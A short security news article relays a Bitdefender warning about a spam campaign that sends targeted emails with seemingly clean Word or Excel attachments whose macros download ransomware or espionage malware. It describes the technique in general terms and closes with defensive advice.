Supposedly clean Office documents download malware

Bitdefender is warning Microsoft Office users against the emergence of a new spam campaign that is looking to trick antispam filters in order to allow spam to pass freely into mailboxes. The campaign’s success is elevated due to the attachment of what appears to be a “clean’ Microsoft document alongside the spam emails.

“For a few days, cybercriminals have been sending targeted e-mails to management departments. The e-mails look like a tax return, a remittance or some kind of bill from a bank and carry a Microsoft Word or Excel attachment,” states Catalin Cosoi, Chief Security Strategist at Bitdefender. “If you’ve recently received an odd tax return or a similar request via email, you may not want to open the file.”

The e-mail isn’t stopped by antispam filters because the file itself is clean. The trap lies in the use of macros within the document. Those lines of code, used in Microsoft Office, are generally used to create formulas or a repetitive task, but they can also interact with the whole Windows environment and have an impact on an entire system.

The code in these “clean’ documents is a command for the victim’s computer to download a piece of malware from a remote server that will execute automatically, with the macro code disguised to bypass traditional antiviruses.

Catalin Cosoi continues, “The malware on the remote server is either a ransomware or an industrial espionage tool. Both are as dangerous as they look: the effect of the ransomware is immediate as it can encrypt a company’s important files and ask for a ransom. The espionage tool can be even more vicious, depending on what kind of files it can access.”

In order to prevent the threat, a company’s network needs security from end to end and it can’t rely on a single defense. You should use an antivirus solution that proactively protects against threats, in order to block the danger before it even has the opportunity to send a command – in this case, to prevent the macro from downloading the malware.

Don't miss